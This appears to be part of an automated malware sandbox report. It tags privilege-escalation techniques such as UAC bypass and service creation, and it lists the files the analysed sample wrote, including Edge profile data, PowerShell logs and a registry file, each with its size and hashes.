Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 4f7152bc5a1a715ef481e37d1c791959
  SHA1: c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7
  SHA256: 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc
  SHA512: 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: ea98e583ad99df195d29aa066204ab56
  SHA1: f89398664af0179641aa0138b337097b617cb2db
  SHA256: a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6
  SHA512: e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 96B
  MD5: 7c0df6294b55b6b8080f767d7f5767f7
  SHA1: 1c9e4619ec787ceb528db5cb281bce3e3dd61252
  SHA256: 6de3c7829033dec610557e71877a579f5cea2f803d49eb732b8b9071026035c0
  SHA512: 66e54840862f0dcf96e4665eae60a20d08ab892d5a7bf9c6f2097dd080d5efd9a81300d9a26a85ab0cf6b2be20962b59cff71cdb603265bf06db6993f52ae294

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 5KB
  MD5: d31ccda0502729c0f96231e5d4b9d65c
  SHA1: 0e6f08af5b101893a5e0b8a8d362fb441b0040a1
  SHA256: 2039efb6072cb7cbe2a32e101b3091cc57f4185911f0262e6f4c0f4d2e1494d7
  SHA512: 8f7fc375a8eae648a4bedde494a728f9ce9ada23d6a4dc8c361f3ff8e8e095005bd91948dc44c38042438c7f88d0e3fc9d75d5a4d3d75b71ac7cf2b3c383c9d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 7KB
  MD5: 4a629e54898a161d9457e859782bc33b
  SHA1: edfc1d1a64b8afb3414280f2da53a235be703d1c
  SHA256: ca05dd8dcab2a74292cad2a04adc84256c9725854eba6936e55c2419d9b8dab0
  SHA512: adf07feec01d3ef60f4807a2ba8ba96a9f4f8ffafbce4ca0964245ce59c6350f74590e96474ad33fcabcbdaa613373ca15a4a2440f86f74c43a9d916d4dfd1f7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 30ad785b71f0aa3af2f0c51d5f98dd9d
  SHA1: db47869f74b93e60936b8f83b3e280643bb5257e
  SHA256: 6822c0a82743d54ce0b373a1dc238f7e1a6f000257d9375c9dc10254c22b6372
  SHA512: abe167b4dbf2340048673c2bc68dfae373ee6a53eae97b931cb2d8d4f0c0fa61dda8b1a32c667033ce3a742a9ba37a6209d3cb43942fec0924df030ab4e8abb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 3f21b841f2072334be968e8a00a947df
  SHA1: 3ad11962ebd89036fe53992f50888f36b1d5d429
  SHA256: f52d46db6f650083463f3718dd0e37bcb0b3b180a35093ffce1829c34ed7dbcf
  SHA512: 65ec25508077426c303895c53574030bb201095eaf13ed01b146ba8e4169c5d57fd98a03fdf02347f966a8e28bc6c4f9b4f249316d6fd8edd18ef077cdbbdfce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 20a446ac65dc41fc00a35876bc78092b
  SHA1: d932f3796b19edc46f04babfe1ea1aa221fe1e5a
  SHA256: a76d986ca89b33941d564b107dcd6f33e03e2ede981d26d361e5e861e1cadc50
  SHA512: 7836f9123171899dccb6d9c58552de63cc3a7182ad5ed7165bbcf306c88e01963081b0b2c99d3741f94898f9f8aee6174164462ab98be22dbdbe2596952db6fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: a842a9ba21eb7c18d5ddd2995c838320
  SHA1: 87a6160e52486e622132d1a19ffd146173b5db59
  SHA256: 69ed109191e7e9617b93ce785412c0802a269ff3dc8ac5b23efae43e14edd2de
  SHA512: 07d1a70eef8ce7112a861ea5b11a2708c58516f59330259a9ec9122c332b85f329d63f354a0c539cd0d4260aa47557fba29498a8cab40c29812616b9f8b3951e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: aa8efa56e1e40374bbd21e0e469dceb7
  SHA1: 33a592799d4898c6efdd29e132f2f76ec51dbc08
  SHA256: 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
  SHA512: ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bpu3xaqx.2so.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
  Filesize: 91B
  MD5: 47b5ae368c4aff20eafa90ffdcd03a34
  SHA1: dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
  SHA256: aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
  SHA512: c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
  Filesize: 1024KB
  MD5: 94194e2fa69ff276dc002efb0f8abcb6
  SHA1: 701f2598e03e52079e6cdc7447b0599074cd0b16
  SHA256: b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc
  SHA512: ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
  Filesize: 7KB
  MD5: 83d0f9f348182309763ee1ccf371bfc6
  SHA1: 1bdeab33c57933dcdc7aeebde33daf840278a43f
  SHA256: 4ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6
  SHA512: 7a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d

\??\pipe\LOCAL\crashpad_2236_BVVCPOGJSIEWSPNF
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/6072-78-0x000001F97F7B0000-0x000001F97F7D2000-memory.dmp
  Filesize: 136KB